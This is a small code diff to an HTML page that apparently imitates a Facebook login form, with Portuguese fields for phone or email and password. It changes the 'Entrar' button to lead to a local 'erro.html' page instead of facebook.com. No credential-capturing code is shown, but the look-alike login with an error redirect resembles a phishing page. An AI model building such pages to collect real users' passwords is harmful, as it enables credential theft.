--- a/index.html
+++ b/index.html
@@ -122,7 +122,7 @@ footer {
                     <form>
                         <input type="email" name="email" id="iemail" placeholder="Telefone ou email" required>
                         <input type="password" name="senha" id="isenha" placeholder="Senha" required>
-                        <a class="btn-x" href="https://www.facebook.com/" class="btn">Entrar</a>
+                        <a class="btn-x" href="erro.html" class="btn">Entrar</a>
                     </form>
                 </div>
         </div>
